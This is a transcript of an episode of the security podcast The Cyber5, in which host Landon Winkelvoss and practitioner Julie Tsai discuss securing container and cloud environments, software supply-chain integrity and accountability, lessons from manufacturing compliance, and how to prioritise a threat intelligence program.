- Welcome to The Cyber5, where security experts and leaders answer five burning questions on one hot topic on actionable intelligence enterprise. Topics include adversary research and attribution, digital executive protection, supply chain risk, brand reputation and protection, disinformation and cyber threat intelligence. I'm your host, Landon Winkelvoss, co-founder of NISOS, the Managed Intelligence Company. In this episode, I talk with senior security practitioner, Julie Tsai. We talk about security intelligence and modern day technology platforms with concentration on how to secure container and cloud environments. We talk about the granular areas of supply chain risk in application development, and where compliance a critical role to ensure the code base is not tampered with, so when security's checked in and updates are performed, what is being submitted is truthful, accurate and complete. We also talk about where threat intelligence can augment a program like this and what noise to discount and data points that need to be actioned that keep security events from turning into incidents. Stay with us. Julie Tsai, welcome to the show. Would you mind sharing a little bit about your background for our listeners, please? - Sure thing, thanks, Landon. Thanks for having me here. I am a cybersecurity leader and advisor. I've spent about 25 years working in various Silicon Valley companies from early stage seven person startups and then took a few years at Walmart eCommerce, so got some exposure to Fortune 500 or Fortune one, in that case, and really excited to be here. - Thank you so much, and I've been wanting to do a deep dive really around containers and cloud infrastructure and everything that that involves with and kind of around threat hunting and threat intelligence aspect. That's what we'll be talking about today. So I guess kind of give us a little bit of a baseline. So like you're in a modern technology environment, working with a technology company, let's call it a company that's probably somewhere between, I don't know, a hundred million and a billion dollars. There's an acknowledgement that you need to make considerable investments within security. So kind of baseline that development security operations within modern enterprise with regard to containers and cloud infrastructure platforms. Particularly around ephemeral objects, what are the major risks? How's that different from like a traditional flat Windows network? - It's useful to think about in terms of what are the advantages that the new infrastructure capabilities with containers and multi-tenancy on the same hardware provide you versus some of the older, more traditional ones. For what it's worth, containers and virtualization and images, you can be operating system agnostic, right? You know, they could theoretically be running Windows, Linux, BSD, any range of things, but the potential that you have with containers and images is to be able to establish a assembly line of repeatable secure patterns. So if you can secure your container, secure your image upfront, and you've got your prototype or your format, you have your formula, at that point, now you can potentially deploy this at scale, right? Hundreds, tens of thousands or more in one secure pattern. Now that said, it also means that mistakes can have the same scale, right? So it comes back to what containers and some of this abstraction technology allow you to do is to get very rapid deployment to very precise configurations in architecture to get them right. But then it becomes even more incumbent, that upstream effort to harden the container and set the right or to set the right images or configurations is truly correct upfront. One of the things that you have to think hard about in terms of the uniqueness of containers is what are the potentials for container to container compromise or host OS level compromises that might impact the container? As one is configuring and prescribing your environment, the baseline of what you want to deploy, you wanna make sure that your initial efforts around the host OS and the container configurations are really done well, to know that you've stripped things down to just the things that you need, that you know what kinds of users and groups are allowed at the level and like what permissions level your containers and your applications are going to be working at, and have a plan around network access and service access. So in a lot of ways, the security benefits that you gain from this are in part due to the higher level of attention or rigor that you need to put around the recipes in the beginning. But once you do that, then you have something that's potentially massively scalable that you have now captured the secure, the secure configurations you've set in the beginning. Now you do have to also pay special attention to memory access, and being able to what exploits or what applications are going to be running in what level of memory space. So when you have a container configuration for your infrastructure, you still have a shared kernel, but now you have these more modular application containers and services layered on top of that. So you have to be very, very cognizant if there are things that can break out of that container, or if there's a host OS level hardening that you have to do to make sure that kernel level memory and kind of thing doesn't get compromised and impact all the layers that are dependent upon that. - There's a lot to unpack right there. I mean, as security professionals, right? You understand if an attacker can compromise one container, regardless of how long it stood up or removed, you can probably compromise numerous containers. You can probably find a way to traverse and a sense of code that's critical to the business that's pushed to production. I mean, these are very much you're in the environment to use a buzzword. I mean, this is the build process that ultimately can lead to an event like a SolarWinds type event. You know, understanding those risks, I think we'd all admit like, compliance is compliance, but I think that compliance has a place to really ensure completeness, accuracy and truth to any threat hunting team, and that's so critical in instant response, so how do you keep accountability on that type of environment? - Great question. I wanna tread gently here, because I know that people think of or hear accountability in different ways. I think it does get back to root values that you need in any organization to thrive, right? There's responsibility, mutual respect, and mutual accountability, right? The code and the development is a core essential piece of that puzzle, but it's only one part of it. One of the things that people talk about a lot nowadays, which I think is an excellent analogy is the supply chain, right? Or the factory assembly line. And it gets back to manufacturing principles around quality control that some of the DevOps gurus like Gene Kim and Josh Corman got to with Deming's principles around quality is like knowing exactly what's going into the build or the recipes of it, and knowing at each step of the way, like exactly what's happening, that there is a prescriptive and high level of quality and no tampering. So if we take some of these concepts from the physical world that people are conversant with, that's tangible, right? Like, I can imagine like, a widget along an assembly line being put together and different things being added to it and changed. At each point can I guarantee that integrity of that change or the thing that was added to it? And that's where the environment and the deployment pipeline starts to become really important, right? Because you may have secured your code, you may have guaranteed the sanctity of a specific source control commit or a pull request, but how about all the changes and touches that happen along the line? You know, when you added such and such package, you did a build on it, when you ran this particular script and then you deployed it to this other environment, and then other things could touch it and impact it, all these different things need to be, have visibility and controls. And if that pipeline is well understood and it's predictable and controlled in a good way, and you know at each step what was the expected output either in terms of execution of scripts or what the check sums of those values were supposed to be, you can come out with a very, very high level of precision on your end product, right? But if it's loosey-goosey and there's a lot of different ways for people to come into that pipeline at various points and unpredictabilities of what's coming in and out, any team, any professionals would be very, very highly challenged to be able to guarantee what was the outcome on that. So I think when you look at things like SolarWinds and why environment and context start to become really important is there are many different places that security issues can get injected into the end product. And it's like that expression, as the blue team, you have to be right all the time, the red team only has to be right once, right? So all those things start to become really important. Containers are an important part of that puzzle, in addition to configuration management. I think that these like classic principles shouldn't be underrated for knowing exactly what you're putting into your special sauce, but none of these things are a silver bullet by themselves. They all require attention and care and feeding, and they can be properly leveraged to do much more than one might have in the past before them. They still need that attention to it. And it gets back to like what lot of security teams like to emphasize about defense in depth and attention, and what you mentioned about accountability, like the teams that are responsible are the custodians and stewards of each step of that pipeline. There has to be really, really clear handoffs and accountability. Like I am responsible for up to this point, now I'm doing a clean and known handoff to this next team, and then they're going to do these transformations on it, and then it's getting handed off again. So you want to make sure, especially as when you have a lot to protect, either in terms of your customer base or their data, your profile starts to expand, and the attack vector starts to get more deep. All of those things about that process and the mutual accountability need to get tighter and tighter. - The supply chain is in the news often, particularly around Log4j, a lot of things are coming out of the White House here in the last six months. Why is the supply chain within the technology environment, why is that so hard? - I think it gets back to complexity management and also the transfer of liability. You know, what you're talking about here in terms of accountability, when things are very close to us, either in terms of what we created or what we have oversight over, right? You know, we feel more accountable to it, and it's also much harder to dodge accountability. When it starts becoming another party, a third party or their dependencies, a third party's third party dependencies, trying to trace what guarantees are along the line, you end up having to rely usually on a much lower level of visibility, usually some kind of contractual agreement, which can't capture all of the nuances and also vary the complexity of different supply chain pipelines and different dependencies inside of there. It's hard enough for us to know and to manage the things that are within our own environment, much less have any chance of understanding the providence in the chain of custody of something in another company or another environment or their third party contracts. So you can see that very quickly, the complexity management almost becomes one of those geometrically harder problems in terms of controlling all of those things, and as the components and the scale of a particular project expands, that complexity just spirals up. So if you don't have both the tooling and the processes dialed in from an early stage, it can be a lot for security teams to get their arms around. - Is it even possible from your perspective to ultimately have visibility into all those different dependencies that you can't control? Does there almost need to be a shift in that type of transparency in how technology is built? - I think one has to be a realist about it, and I do think that over time, if we're gonna have any hope of really inter-operating and managing our stuff in any kind of trustworthy way, we as technology creators and vendors to each other have to really commit to making things more simple and transparent. I think open source has done a tremendous amount in this arena in terms of decoupling the idea of security and obscurity, right? You know, this idea that like, "Hey, the strength of the security is not about not knowing that algorithm. It's that you can't necessarily break it." So the overall should be about I can disclose enough about what we do and how we do it without giving away essential secrets. And I think that's like, that's one major step, but I think that we do have a complexity problem because there's, the demands aren't stopping. There's all the normal pressures to create and move fast with like limited staffs. And so like the commitment to simplifying isn't always there unless the consumer's demanding it. So we have to demand it of each other and maybe help consumers, laypeople, to really understand what's happening under the hood in a way that's transparent, and I think that becomes more of a cultural change. But I do think that it's important to continue to hold high standards. We can't just throw up our hands and say, "Hey, it can't be done, so forget it." What we're guarding here is pretty important. It comes back to integrity and confidentiality and trustworthiness. We can't afford not to continue trying. I remember a teacher once telling my class on something, "You know, I'm gonna tell you a secret," he said. "It's impossible to be perfect. I'm not supposed to tell you that, but it's impossible to be perfect. But it's the trying that matters." And there was this really important contradiction there that I think I also take into security in that you're not gonna be perfect, but what you have to do is you have to keep up the rigorous examination of what you're doing and how you're doing, that you're always investing your efforts in the right place and that you are surfacing things up for fundamental or revolutionary changes where they need to be. So I think in that respect, we have to keep pushing the envelope on that. There's certain things that like, over the last 30 to 40 years, consumers have adapted so much, right? Like not only do we all have computers on our desktops and home offices and schools now, but everyone wears devices, and oftentimes now multiple ones. Could we not also challenge each other and our consumers to understand better what kind of data is being stored and what data is being given away? You know, two-factor authentication used to be something that only the specialized professionals were working with, but now it's something that every consumer is familiar enough with. So I think we have to set that bar for ourselves as well as our customers in terms of really understanding what's happening. - That's absolutely fascinating, and I guess leads to something you said earlier around manufacturing. You know, I wanna be careful certainly how I say this. Nobody in technology likes the regulation word. - Sure, sure. - But be that as it may, right? Manufacturing, energy, these are environments that have had compliance standards. To your point of if there's something that goes into a retail product, a consumer product, a manufacturing process, they know exactly okay, that that machine at that time on that date had a problem, that's where the problem is, let's do a recall. These are all very tried and true processes that a lot of these types of companies have to comply with. What can the technology sector learn from that, and where do we kind of need to adapt to here over the next three to five years? - We can certainly borrow the important concepts here, right? Like being able to know like the integrity of every artifact and like understanding how something goes together. You know, that's something that like those manufacturing principles are built in in terms of policies. But we also, in the technology sector, we do some version of this, right? Like if in any kind of like source control commit trail, those are all check sums that we're double checking on or like, fingerprinting different kinds of artifacts. Like there's a way to make this tech native, but still borrow the principle behind it. I think that the gap that I see is that a lot of people outside of the industry don't connect the abstractions of the computing supplies with like the physical things that they see every day, like the meat at the grocery store or the pharmaceuticals that, a bottle of aspirin at the drug store, that like, hey, there's a parallel for that in the digital world. So I think we can definitely be borrowing from those things. I think to the tech industry and like to ourselves as peers, the way that I would characterize it is that we should have internal discipline and internal regulation over these things so that we can have a say in how this goes. Every technologist wants to help create a better future or like a more powerful future, but we also need to build in, we have to include security and safety and privacy as part of the goods with that, that if I can do this thing in a way that's more secure and transparent, that's also a good. You know, speed and volume are not the only, are not the only qualities or goods that we're looking for. And to be able to understand that if we don't show that quality internal regulation ourselves, then something else will force it from the outside, either some terrible major event or some zealous lawmakers. And so I think it's definitely in our interests to do the right thing and to internalize, "Hey, this is the way I think it should go," so that we can still maintain our speed and precision and elegance, but really still help the consumer. I think it's important to understand that like, there's some kind of feedback loop there, right? To how that happens. One of my favorite technologists, Mark Burgess had said years ago, like, we haven't yet had our Three Mile Island incident with information technology, but when you consider how much is dependent on it nowadays from power grids to utilities to the way we produce food and every manufacturing thing, there's a tremendous amount of important and fragile things that computing technology is in charge of. - That's very nuanced for sure, and it's gonna be certainly interesting to see how this evolves and certainly how we can do so in a way that doesn't take outside influencer control from regulators, 'cause I mean that's part of the interest and fun in technology is we can move fast and just change markets almost in a lot of different ways. Shifting slightly, this is generally an intelligence or threat intelligence type podcast. I'm kind of curious how threat intelligence really can be applied here. Like if you're tearing down a container or a cloud instance every time a malicious actor scans the environment or gets a ping, that's just not gonna be fruitful for the business. Thinking about like outside the firewall telemetry and everything that can be kind of collected, how can that be used in a way that's actionable in these types of environments that you're talking about regarding DevSecOps and container environments? - Threat intel is a fundamental and critical piece to the security puzzle and the stability puzzle for any organization, and I think it gets back to the heart of that question you asked about whether or not it's realistic to be perfect. No, it's not realistic to be perfect, and it's a little bit of a mindset shift from, I think DevOps or infrastructure professionals where you can afford to be a little bit more purely internal looking and say like, "Okay, well this is my area I'm master of or mistress of my domain, and I know exactly everything that went in there." Great, but you are not going to be able to account for what the most significant threats are out there if you don't have an ear to the ground and your eyes perked up for what's happening in the landscape. Understanding like where threats are gathering, where people are trying to focus their efforts and be really, really keened into, "Hey, right, this group is sending out benign scans every few hours." But like, if we're not seeing a change in other activity, other more deeper types of attacks, like we're gonna accept that there's a certain amount of noise there. But what I am very concerned about is let's say those login attempts are trying to come in from this other place, and that seemed to be changing their approach every, let's say every couple of days and so you cannot afford to be too insular. You have to look outwards and understand what's happening in the ecosystem because you're always gonna have not enough resources, not enough people, not enough defense in depth. So you've gotta make really smart decisions about based on your internal strengths and weaknesses and based on your threats and opportunities outside, where are you gonna put your chips? - Where do you prioritize that in everything that you have to do? When you talk about identity access management, you talk about blocking attack, you talk about firewall policies, you talk about EDR, the defense in depth paradigm that you just kind of listed? I know that's not a one size fits all, but kind of where does intelligence then start to, really start to add value? - I think the value, you're gonna see it the most in companies and services that are highly attacked, right? You know, in areas that are high interest or for whatever reason, like the technology or the value of what's being held is highly sought after by some constant, some focused group outside of yours. In that case, that's where you're gonna start seeing rewards on your threat intel program immediately. I think one of the challenges in the security and the threat space is that we have to overcome our own blinders or assumptions on what we think an attacker would be interested in. I can't tell you how many times I've heard like, "Oh, well, you know, that's improbable or I'm not interested or that's probably not gonna happen." And it's like, "Well, this is true for you. Maybe you and I wouldn't try to attack in that way. But someone out there, like this particular profile, they have a different interest." And so being able to really empathize with there's gonna be different types of motivated people out there, and you cannot always anticipate, you can't always graft your own psychology onto what like an external group is gonna do. So you have to be able to be humble and be realistic about like, "Hey, like how attacked do I think we're gonna be?" Now, when is the right time to start a threat intel program? I think from the beginning. Most companies will see it as a higher level of activity, and so you're not necessarily going to put the lion's share of your budget in an infant security program through threat intel, and that's the right thing to do is in terms of unless you're attack profile's particularly bad to focus on internal strengthening and defenses. However, I think that like with most things, things are easier to graft onto in the long run if you have a early native concept of it. So even if your initial threat intel program is something that's a lighter touch than you might do two or three years down the line with a bigger team and more tooling, you might start with getting some like key feeds or cultivating a few key relationships or associations, and maybe that's what your team can afford to do when it's a certain size. And then as things change and as you're starting to see more signal, like you will also get more feedback on is this gonna be useful to you, and like how much more should you ramp it up? Because you must go in with the assumption that you're not gonna be able to predict every worst threat or how costly it's going to be to you. So go in with enough humility to distribute the bet somewhat. Since security is a weakest link in the chain issue, you wanna make sure that you have some type of coverage in every essential area. - And when you say essential areas, what do you mean exactly? - Coming into a new program, you might be looking at, "Okay, we need to do a very good risk assessment. We need to start standards and figure out our, how we map to certain business goals we have." You might be looking at standing up your internal defenses, making sure that your network security and your vulnerability management are ramping up as quickly as they need to be. So those are things that are fundamentals. Your monitoring and incidents detection, those are fundamentals, and building those core pieces together, and I think threat intel is a piece of that. And in the beginning, even if it's a lighter touch, you wanna give the roots to developing that program in the in the longer view. - Is there any key aspects specifically to threat intelligence that you would want to focus on? I mean, do you focus on doing attack surface management? Do you look at like getting credential dumps? Do you wanna focus on answering just RFIs or basic questions that are out there? I guess kind of like what would be a good starting place for looking at like the technology sector? - I would focus on- With any new capacity, you start with a simple question about like, "What's my monitoring or knowledge level going to be, and what's my actionability, my fixed rate or remediation's gonna be?" And so you just start with some very simple questions around that. Now where to focus your threat intel efforts I think really has to be tailored to your business. If you work in a business that you have a lot of customers that are not as savvy about passwords, or it's a very wide audience, a very broad audience, you have to pay attention to account management and credentials, especially things that are found in the wild. If you have very high value targets, either in terms of your community base or your executive profiles, you have to look at how information is shared out publicly and what kind of lines of defense you have around certain kinds of information. How are you categorizing data and signal monitoring on that? So I think that where you wanna focus first, like if I start with those simple questions about monitoring and fixing, what's the nature of my business in terms of my crown jewels? Whether it's like revenue or data or special technical facts, and the profiles of the people who are using my site, as well as the profiles of the type of attackers we draw. You know, a banking site will have a very different profile than a e-commerce site or a gaming site, or even probably a cryptocurrency site. There will be overlap, of course, but there's certain kinds of qualities that products and infrastructures are gonna draw out different kinds of threats. - Julie, you're world class in your craft. I can't thank you enough for taking the time and appreciate joining the show today. - For the latest subject matter expertise around managed intelligence, please visit us www.nisos.com. There we feature all the latest content from NISOS experts on solutions ranging from supply chain risk, adversary research and attribution, digital executive protection, merger and acquisition diligence, brand protection and disinformation, as well as cyber threat intelligence. A special thank you to all NISOS teammates who engage with our clients to conduct some of the world's most challenging security problems on the digital plane and conduct high stakes security investigations. Without the value the team provides day in, day out, this podcast would not be possible. Thank you for listening.